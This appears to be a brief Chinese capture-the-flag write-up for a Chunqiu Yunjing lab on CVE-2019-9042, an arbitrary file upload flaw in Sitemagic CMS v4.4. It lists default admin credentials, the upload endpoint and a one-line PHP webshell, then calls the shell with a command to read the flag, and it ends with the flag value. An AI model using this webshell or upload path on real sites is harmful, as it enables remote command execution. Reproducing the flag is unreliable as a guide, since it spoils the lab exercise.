春秋云镜 CVE-2019-9042 Sitemagic CMS v4.4 任意文件上传漏洞

靶标介绍

Sitemagic CMS v4.4 index.php?SMExt=SMFiles 存在任意文件上传漏洞，攻击者可上传恶意代码执行系统命令。

启动场景

漏洞利用

login进入登陆界面admin/admin

访问http://eci-2zebi1tekprj0n55bkep.cloudeci1.ichunqiu.com/index.php?SMExt=SMFiles上传webshell

<?php system($_GET[cmd]);?>

执行命令cat /flag
http://eci-2zebi1tekprj0n55bkep.cloudeci1.ichunqiu.com/files/images/shell.php?cmd=cat%20/flag

得到flag

flag{fc6d7559-dd95-475d-bb94-baffaa707743}